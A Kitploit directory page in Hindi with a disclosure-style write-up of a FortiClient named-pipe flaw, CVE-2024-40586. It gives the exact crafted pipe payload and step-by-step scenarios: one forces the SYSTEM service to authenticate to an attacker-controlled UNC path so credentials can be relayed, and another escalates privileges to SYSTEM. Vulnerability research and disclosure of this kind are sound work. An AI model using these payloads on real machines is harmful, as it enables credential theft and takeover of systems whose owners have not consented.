Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-40586-Windows-Coerced-Authentication-in-FortiClient — CVE-2024-40586 के लिए शोषण: यह एक कमजोर FortiClient नामित पाइप के माध्यम से विंडोज होस्ट को प्रमाणीकरण के लिए मजबूर करता है, जिससे SYSTEM तक विशेषाधिकार वृद्धि या रिले हमलों के माध्यम से पार्श्व गति संभव होती है। | Kitploit
उपकरण/GitHubGitHub/hagrid29/cve-2024-40586-windows-coerced-authentication-in-forticlient
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपार्श्व आंदोलनपेनिट्रेशन टेस्टिंगप्रमाणीकरणरेड टीमिंग
GitHubhagrid29/cve-2024-40586-windows-coerced-authentication-in-forticlient

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-40586-Windows-Coerced-Authentication-in-FortiClient

CVE-2024-40586 के लिए शोषण: यह एक कमजोर FortiClient नामित पाइप के माध्यम से विंडोज होस्ट को प्रमाणीकरण के लिए मजबूर करता है, जिससे SYSTEM तक विशेषाधिकार वृद्धि या रिले हमलों के माध्यम से पार्श्व गति संभव होती है।

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

CVE-2024-40586 विंडोज में FortiClient में बाध्य प्रमाणीकरण

विंडोज सिस्टम पर, यह पाया गया कि FortiClient (ऐप संस्करण 7.0.8.0427) एक दूरस्थ अविशेषाधिकार प्राप्त उपयोगकर्ता को FortiSSLVPNdaemon सेवा के लिए जिम्मेदार एक नामित पाइप के माध्यम से विंडोज होस्ट को अन्य मशीनों पर प्रमाणित करने के लिए मजबूर करने की अनुमति देता है।

यह देखा गया कि नामित पाइप "FortiSslvpnNamedPipe" किसी भी उपयोगकर्ता से पढ़ने और लिखने की अनुमति देता है।

Fig1

विश्लेषण

ऐप नामित पाइप से बफर के 5वें बाइट को op कोड PipeBuffer+4 के रूप में पढ़ता है

Fig2

यह देखा गया कि यदि op कोड 24 (अर्थात, 0x18) के बराबर है तो ऐप फ़ाइल पढ़ेगा कोड प्रवाह: Case 24 => LABEL_26 => strncpy पेलोड को वेरिएबल Buffer में कॉपी करता है => पेलोड को sub_7FF60C3EAC20 पर पास करता है => CreateFileA को कॉल करता है => ReadFile Fig3

Fig4

Fig5

हालांकि, एप्लिकेशन फ़ाइल सामग्री के बारे में कुछ नहीं करता है।

शोषण

हम कमजोर नामित पाइप "FortiSslvpnNamedPipe" पर एक क्राफ्टेड ट्रैफ़िक (अर्थात, "\x00\x00\x00\x00\x18\x00" को लक्ष्य पथ के साथ जोड़कर) भेज सकते हैं ताकि op कोड 24 ट्रिगर हो और प्रक्रिया "FortiSSLVPNdaemon.exe" को SYSTEM विशेषाधिकार के साथ CreateFileA कॉल करने के लिए मजबूर कर सकें। इसलिए, हम सर्वर को UNC पथ (जैसे, "\\<रिमोट आईपी>\<फ़ाइल पथ>") सबमिट करके रिमोट फ़ाइल से कनेक्ट करने या स्थानीय नामित पाइप (जैसे, "\\127.0.0.1\pipe\<नामित पाइप>") से कनेक्ट करने के लिए मजबूर कर सकते हैं।

परिदृश्य 1

एक दूरस्थ अप्रमाणित उपयोगकर्ता के साथ विंडोज होस्ट को अन्य मशीनों पर प्रमाणित करने के लिए मजबूर करने के लिए, उपयोगकर्ता निम्नलिखित चरण का पालन कर सकता है:

  1. हमलावर मशीन पर, बाध्य प्रमाणीकरण प्राप्त करने के लिए एक श्रोता प्रारंभ करें
  2. हमलावर मशीन पर, पीड़ित मशीन के कमजोर नामित पाइप "\\<पीड़ित आईपी>\pipe\FortiSslvpnNamedPipe" पर क्राफ्टेड पेलोड (अर्थात, "\x00\x00\x00\x00\x18\x00" + "\\<हमलावर आईपी>\fake\fake") भेजें ताकि प्रक्रिया को UNC पथ "\\<हमलावर आईपी>\fake\fake" के साथ एक रिमोट फ़ाइल से कनेक्ट करने के लिए मजबूर करें
  3. अन्य बाध्य प्रमाणीकरण हमलों (जैसे, SpoolSample) के समान, हमलावर रिले हमला या प्रमाणीकरण डाउनग्रेड हमला कर सकता है

Fig6

परिदृश्य 2

एक स्थानीय उपयोगकर्ता से "SeImpersonatePrivilege" (जैसे, "nt authority\network service") के साथ SYSTEM तक विशेषाधिकार वृद्धि करने के लिए, उपयोगकर्ता निम्नलिखित चरणों का पालन कर सकता है:

  1. एक नामित पाइप सर्वर बनाएं जो कनेक्शन की प्रतीक्षा करता है।
  2. स्थानीय कमजोर नामित पाइप "\\.\pipe\FortiSslvpnNamedPipe" पर क्राफ्टेड पेलोड (अर्थात, "\x00\x00\x00\x00\x18\x00" + "\\127.0.0.1\pipe\<पाइप सर्वर>\XXX") भेजें ताकि प्रक्रिया को हमारे नामित पाइप सर्वर से कनेक्ट करने के लिए मजबूर करें
  3. कनेक्शन आने के बाद, SYSTEM विशेषाधिकार का प्रतिरूपण करने के लिए ImpersonateNamedPipeClient() को कॉल करें।

Fig7

समयरेखा

  • 07/09/2023 - भेद्यता Fortinet को रिपोर्ट की गई
  • 08/30/2023 - Fortinet ने भेद्यता की पुष्टि की
  • 02/11/2024 - प्रकाशन

संदर्भ

  • https://fortiguard.fortinet.com/psirt/FG-IR-23-279
टूल डाउनलोड करें